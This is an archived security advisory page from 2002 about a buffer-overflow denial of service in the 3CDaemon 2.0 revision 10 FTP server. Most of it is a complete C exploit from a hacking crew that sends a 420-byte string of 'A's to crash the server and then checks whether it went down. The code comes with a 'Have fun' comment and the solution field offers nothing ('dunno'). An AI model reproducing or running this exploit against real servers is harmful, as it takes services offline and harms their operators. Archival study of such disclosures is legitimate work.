Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows :: win5322.htm

3Cdaemon remote DoS



2nd May 2002 [SBWID-5322]
COMMAND

	3Cdaemon remote DoS

SYSTEMS AFFECTED

	3Cdaemon 2.0 revision 10

PROBLEM

	MaD SKiLL \'H\' [http://www.madskill.tk] says :
	

	When 400+ chars are sent to the FTP server, it crashes imediatly.
	

	 Sample :

	 ========

	

	

	/* MaD SKiLL \'H\'

	* MsH 4 life! http://www.madskill.tk

	* *Private Release*

	*

	* 3CDaemon 2.0 revision 10 DoS

	*

	* 11:12 14-4-2002: BOF flaw found by skyrim

	*  1:00 15-4-2002: exploit done.

	* 23:31 16-4-2002: Edited the exploit slightly, it\'s a better code now

	*

	* This program will exploit the buffer overflow vulnerability of

	* 3CDaemon 2.0 FTP servers. Sending 400+ chars will make the server crash

	* at any time they\'re send.

	*

	* Tested on:

	* [OS]                                    [version]

	*  Windows XP (5.1 - 2600)                 3CDaemon 2.0 revision 10

	*

	*  ###

	* #####      ####                            ##

	* ######    ######                         ######

	* ######   ########   ########            ########      ######

	* ######  ####### ### ###########          ########     #######

	* ###### ######## #### ############        ########     #######

	* ############### ##### ############        #######     #######

	* ############## ######  ############       #######     #######

	* ############## #######  ###########        ######    #######

	* ############# ########  ### ########       ######  #########

	*  ############ ### ####  ### #######        #################

	*   ##### ###############  ##########        #################

	*    ###  ######### #####  #########         ################

	*    #### ######### ##### #########          ################

	*     ### ######### #############            ################

	*      ## #########  ######                  ######   #######

	*          ### ####                          ######   #######

	*                                            ######  ########

	*                                            ######  ########

	*    ####   ## ###### ###  ###        ###    ######  ########

	*   ####### ########  ###  ####      #####    #####   #######

	*   ###############   ###  ####      #####     #####  #######

	*   ####### ########       ####      #####       ##     ###

	*   ######  ######### #### ####      #####

	*    #####   ######## #### ####       ####

	*     ###### ######## #### ####   ### ####   ##

	*      ########## ### #### #### ########## ######

	*       ######### ### ###########################

	*      ##########  ######## #####################

	*    #############  ######  ########## ##########

	*   ########  #####   ####  ###   ###  ###   ###

	*

	* I don\'t know if this will work on versions other then the one I tested it 

	on.

	* Have fun.

	*

	* Crew shouts go to: MsH, DFA, uDc

	* Personal shouts to: mannie, primus, amok, torment, talented, warsteam, 

	frodo, maxxo,

	* xo|l, fearless, cybje, kell, frodo, maxxo, and everyone else.

	*

	* skyrim (skyrim@m4dskill.tk)

	*/

	#include <stdio.h>

	#include <sys/types.h>

	#include <sys/socket.h>

	#include <netinet/in.h>

	#include <netdb.h>

	

	#define BOFSIZE 420

	

	char banner(void) { printf(\"MaD SKiLL \'H\' 3CDaemon 2.0 revision 10 

	DoS\\n.:[MsH]:.\\n   ---\\n\"); }

	

	void E(char *msg) { perror(msg); exit(1); }

	

	main(int argc, char *argv[])

	{

	    static char ownage[BOFSIZE];

	    int sockfd, sockfd2, n;

	

	    struct sockaddr_in server_addr;

	    struct hostent *server;

	

	if (argc != 3) {

	    fprintf(stderr,\"Usage: %s hostname/ip port\\n\", argv[0]);

	    exit(1);

	   }

	    banner();

	    memset(ownage, \'A\', BOFSIZE);

	    sockfd = socket(AF_INET, SOCK_STREAM, 0);

	    if (sockfd < 0) E(\"Error occured during opening socket\");

	    server = gethostbyname(argv[1]);

	    if (server == NULL) E(\"Error occured during host lookup -No such 

	host?-\\n\");

	

	    bzero((char *) &server_addr, sizeof(server_addr));

	    server_addr.sin_family = AF_INET;

	    bcopy((char *)server->h_addr,

	         (char *)&server_addr.sin_addr.s_addr,

	         server->h_length);

	    server_addr.sin_port = htons(atoi(argv[2]));

	    printf(\"Connecting to target FTP server... \");

	    if (connect(sockfd,&server_addr,sizeof(server_addr)) < 0) { E(\"Error 

	occured during connecting\\n\"); }

	    printf(\"Connected, Probing BOF... \\n\");

	    n = write(sockfd,ownage,strlen(ownage));

	    if (n < 0) { E(\"Error occured during writing to socket\"); }

	    close(sockfd);

	    sockfd2=socket(AF_INET, SOCK_STREAM, 0);

	    printf(\"Done, checking if server is dead.. \\n\");

	    sleep(5);

	    if (connect(sockfd2,&server_addr,sizeof(server_addr)) < 0) { 

	printf(\"Couldn\'t establish connection: It seems like it died! =)\\n\"); 

	exit(0); }

	    printf(\"Server is still alive. Perhaps its not vulnerable?\\n\");

	    return 0;

	}

	

	

	

	

SOLUTION

	dunno


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH